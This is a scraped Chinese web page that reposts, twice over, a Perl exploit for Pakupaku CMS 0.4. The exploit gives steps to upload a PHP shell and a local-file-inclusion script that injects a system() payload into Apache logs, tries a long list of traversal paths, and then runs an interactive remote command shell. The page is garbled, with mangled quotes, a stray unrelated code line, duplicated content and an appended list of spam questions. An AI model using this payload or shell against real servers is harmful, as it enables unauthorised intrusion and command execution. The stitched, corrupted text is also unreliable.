@python sys.argv 用法== 2 and ($ARGV[1] > 0 or die "usage:$0 directory [depth]\n");
点击联系发帖人
时间:2016-08-09 11:38
(C)&&2013&&Alibaba&&Inc.&&All&&rights&&resvered.
Powered byPakupaku CMS <= 0.4 Remote File Upload / LFI Vulnerability
当前位置:>>>>文章内容
Pakupaku CMS <= 0.4 Remote File Upload / LFI Vulnerability
来源:www.vfocus.net 作者:GoLd_M 发布时间:
#!/usr/bin/perl
#########################################################################################
# Pakupaku CMS &= 0.4 Remote File Upload Vulnerability
# 1- [Path_Script]/index.php?page=Uploads
# 2- Upload GoLd-M.php &= [Php Shell]
# 3- [Path_Script]/uploads/GoLd-M.php &= [Php Shell]
# D.Script :
http://heanet.dl.sourceforge.net/sourceforge/pakupaku/pakupaku-0.4.tar.gz
#########################################################################################
:/search?client=opera&rls=en&q=Powered+by+Pakupaku+CMS&sourceid=opera&ie=utf-8&oe=utf-8
# Pakupaku CMS 0.4 (Local Inclusion) Remote Command Execution Exploit
use LWP::S
#ripped from rgod
&../../../../../var/log/httpd/access_log&,
&../../../../../var/log/httpd/error_log&,
&../apache/logs/error.log&,
&../apache/logs/access.log&,
&../../apache/logs/error.log&,
&../../apache/logs/access.log&,
&../../../apache/logs/error.log&,
&../../../apache/logs/access.log&,
&../../../../apache/logs/error.log&,
&../../../../apache/logs/access.log&,
&../../../../../apache/logs/error.log&,
&../../../../../apache/logs/access.log&,
&../logs/error.log&,
&../logs/access.log&,
&../../logs/error.log&,
&../../logs/access.log&,
&../../../logs/error.log&,
&../../../logs/access.log&,
&../../../../logs/error.log&,
&../../../../logs/access.log&,
&../../../../../logs/error.log&,
&../../../../../logs/access.log&,
&../../../../../etc/httpd/logs/access_log&,
&../../../../../etc/httpd/logs/access.log&,
&../../../../../etc/httpd/logs/error_log&,
&../../../../../etc/httpd/logs/error.log&,
&../../.. /../../var/www/logs/access_log&,
&../../../../../var/www/logs/access.log&,
&../../../../../usr/local/apache/logs/access_log&,
&../../../../../usr/local/apache/logs/access.log&,
&../../../../../var/log/apache/access_log&,
&../../../../../var/log/apache/access.log&,
&../../../../../var/log/access_log&,
&../../../../../var/www/logs/error_log&,
&../../../../../var/www/logs/error.log&,
&../../../../../usr/local/apache/logs/error_log&,
&../../../../../usr/local/apache/logs/error.log&,
&../../../../../var/log/apache/error_log&,
&../../../../../var/log/apache/error.log&,
&../../../../../var/log/access_log&,
&../../../../../var/log/error_log&
print & ########################################################################\n&;
print & # Pakupaku CMS 0.4 (Local Inclusion) Remote Command Execution Exploit
print & # Discovered by: GoLd_M = [Mahmood_ali]
print & # Thanx To : Tryag-Team & Asbmay's Group & bd0rk & All My Friends
print & ########################################################################\n\n&;
if (@ARGV & 3)
print & ########################################################################\n&;
print & # Usage: 3xp|017.pl [site] [Path] [apache_path]
print & # Apache Path:
print & ########################################################################\n&;
while($apache[$i])
{ print &[$i] $apache[$i]\n&;$i++;}
$host=$ARGV[0];
$path=$ARGV[1];
$apachepath=$ARGV[2];
print &[RST] Injecting some code in log files...\n&;
$CODE=&&?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);?&&;
$socket = IO::Socket::INET-&new(Proto=&&tcp&, PeerAddr=&&$host&, PeerPort=&&80&) or die &[RST] Could not connect to host.\n\n&;
print $socket &GET &.$path.$CODE.& HTTP/1.1\r\n&;
print $socket &User-Agent: &.$CODE.&\r\n&;
print $socket &Host: &.$host.&\r\n&;
print $socket &Connection: close\r\n\r\n&;
close($socket);
print &[RST] Shell!! write q to exit !\n&;
print &[RST] IF not working try another apache path\n\n&;
print &[shell] &;$cmd = &STDIN&;
while($cmd !~ &q&) {
$socket = IO::Socket::INET-&new(Proto=&&tcp&, PeerAddr=&&$host&, PeerPort=&&80&) or die &[RST] Could not connect to host.\n\n&;
print $socket &GET &.$path.&index.php?page=&.$apache[$apachepath].&%00&cmd=$cmd HTTP/1.1\r\n&;
print $socket &Host: &.$host.&\r\n&;
print $socket &Accept: */*\r\n&;
print $socket &Connection: close\r\n\n&;
while ($raspuns = &$socket&)
print &[shell] &;
$cmd = &STDIN&;
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
&§最新评论:
CopyRight&&&
All Rights Reserved}
Powered byPakupaku CMS <= 0.4 Remote File Upload / LFI Vulnerability
当前位置:>>>>文章内容
Pakupaku CMS <= 0.4 Remote File Upload / LFI Vulnerability
来源:www.vfocus.net 作者:GoLd_M 发布时间:
#!/usr/bin/perl
#########################################################################################
# Pakupaku CMS &= 0.4 Remote File Upload Vulnerability
# 1- [Path_Script]/index.php?page=Uploads
# 2- Upload GoLd-M.php &= [Php Shell]
# 3- [Path_Script]/uploads/GoLd-M.php &= [Php Shell]
# D.Script :
http://heanet.dl.sourceforge.net/sourceforge/pakupaku/pakupaku-0.4.tar.gz
#########################################################################################
:/search?client=opera&rls=en&q=Powered+by+Pakupaku+CMS&sourceid=opera&ie=utf-8&oe=utf-8
# Pakupaku CMS 0.4 (Local Inclusion) Remote Command Execution Exploit
use LWP::S
#ripped from rgod
&../../../../../var/log/httpd/access_log&,
&../../../../../var/log/httpd/error_log&,
&../apache/logs/error.log&,
&../apache/logs/access.log&,
&../../apache/logs/error.log&,
&../../apache/logs/access.log&,
&../../../apache/logs/error.log&,
&../../../apache/logs/access.log&,
&../../../../apache/logs/error.log&,
&../../../../apache/logs/access.log&,
&../../../../../apache/logs/error.log&,
&../../../../../apache/logs/access.log&,
&../logs/error.log&,
&../logs/access.log&,
&../../logs/error.log&,
&../../logs/access.log&,
&../../../logs/error.log&,
&../../../logs/access.log&,
&../../../../logs/error.log&,
&../../../../logs/access.log&,
&../../../../../logs/error.log&,
&../../../../../logs/access.log&,
&../../../../../etc/httpd/logs/access_log&,
&../../../../../etc/httpd/logs/access.log&,
&../../../../../etc/httpd/logs/error_log&,
&../../../../../etc/httpd/logs/error.log&,
&../../.. /../../var/www/logs/access_log&,
&../../../../../var/www/logs/access.log&,
&../../../../../usr/local/apache/logs/access_log&,
&../../../../../usr/local/apache/logs/access.log&,
&../../../../../var/log/apache/access_log&,
&../../../../../var/log/apache/access.log&,
&../../../../../var/log/access_log&,
&../../../../../var/www/logs/error_log&,
&../../../../../var/www/logs/error.log&,
&../../../../../usr/local/apache/logs/error_log&,
&../../../../../usr/local/apache/logs/error.log&,
&../../../../../var/log/apache/error_log&,
&../../../../../var/log/apache/error.log&,
&../../../../../var/log/access_log&,
&../../../../../var/log/error_log&
print & ########################################################################\n&;
print & # Pakupaku CMS 0.4 (Local Inclusion) Remote Command Execution Exploit
print & # Discovered by: GoLd_M = [Mahmood_ali]
print & # Thanx To : Tryag-Team & Asbmay's Group & bd0rk & All My Friends
print & ########################################################################\n\n&;
if (@ARGV & 3)
print & ########################################################################\n&;
print & # Usage: 3xp|017.pl [site] [Path] [apache_path]
print & # Apache Path:
print & ########################################################################\n&;
while($apache[$i])
{ print &[$i] $apache[$i]\n&;$i++;}
$host=$ARGV[0];
$path=$ARGV[1];
$apachepath=$ARGV[2];
print &[RST] Injecting some code in log files...\n&;
$CODE=&&?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);?&&;
$socket = IO::Socket::INET-&new(Proto=&&tcp&, PeerAddr=&&$host&, PeerPort=&&80&) or die &[RST] Could not connect to host.\n\n&;
print $socket &GET &.$path.$CODE.& HTTP/1.1\r\n&;
print $socket &User-Agent: &.$CODE.&\r\n&;
print $socket &Host: &.$host.&\r\n&;
print $socket &Connection: close\r\n\r\n&;
close($socket);
print &[RST] Shell!! write q to exit !\n&;
print &[RST] IF not working try another apache path\n\n&;
print &[shell] &;$cmd = &STDIN&;
while($cmd !~ &q&) {
$socket = IO::Socket::INET-&new(Proto=&&tcp&, PeerAddr=&&$host&, PeerPort=&&80&) or die &[RST] Could not connect to host.\n\n&;
print $socket &GET &.$path.&index.php?page=&.$apache[$apachepath].&%00&cmd=$cmd HTTP/1.1\r\n&;
print $socket &Host: &.$host.&\r\n&;
print $socket &Accept: */*\r\n&;
print $socket &Connection: close\r\n\n&;
while ($raspuns = &$socket&)
print &[shell] &;
$cmd = &STDIN&;
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
&§最新评论:
CopyRight&&&
All Rights Reserved}
我要回帖
更多关于 python argv 的文章
更多推荐
- ·多多买菜自提点收入一件挣多少?
- ·村厂房危房改造找哪个部门走平台政府怎么处理村厂房改建有补助款吗?
- ·请问绍兴会问科技公司准备为33位员工是怎么看企业与员工的关系?
- ·考虑买六桂福金子纯吗品牌的黄金,纯度高吗?
- ·七朵七彩集团是做什么的主要从事哪个领域的业务?
- ·在伯仟办理过一次两千多的手机分期,又办理过一次现金贷 还款是两年
- ·康宝莱减肥有效吗从美国寄过来的为什么要把瓶子抠掉条码
- ·中山市办理房产证去哪?
- ·全国永州餐饮连锁加盟店店哪家好?加盟费用大概多少?
- ·农村商业银行2016分红里面的分红多少岁可以使用
- ·我来贷信用借贷的额度额度521分能借多少
- ·百叶轮成型机同行业前五位
- ·王者荣耀雅典娜多少钱买上复活甲有没有效果
- ·抱歉,程序写好了,但还是干不过codewars的OJ系统
- ·img文件用usb burning tool 64加载显示license解析失败怎么解决?
- ·android jni返回字符串数组的字符串是乱码怎么办
- ·杀戮魔幻粒子表白软件下载谁有?
- ·逆战登陆出现错误报告有那个模拟登陆的软件吗
- ·@python sys.argv 用法== 2 and ($ARGV[1] > 0 or die "usage:$0 directory [depth]\n");
- ·万州那里有淘宝图片制作软件
- ·谁会感谢作曲雅歌?qq号说一下谢了
- ·qq怎么发起投票在QQ里投票支持得票多
- ·外贸电子商务专员业包括什么 希望有外贸生意
- ·火狐浏览器打开网页总是00203.net这怎么删除
- ·866365.com为什么进不去
- ·听上班的同学说现在UI设计挺火的,想问一下对于零基础学习ui设计难度大吗?
- ·彼得 林奇 怎样选择成长股.pdf
- ·求to love出包王女第一季无修版高清无修,我的百度云是18907838256,谢谢啦
- ·美团外卖红包自动接单为什么总是缺纸壮态
- ·万利达dvd影碟机电源出现l0rd是什么意思怎样解决
- ·笔记本调节亮度重做wen7系统怎么调节亮度
- ·郴州财神如家酒店wifi密码码是多少
- ·有没有那种专门分享微信群扫二维码分享到朋友圈的网站
- ·新手小弟跪求拜求大神把一张图的举牌是什么意思PS到第二张图里去,小弟是新手没
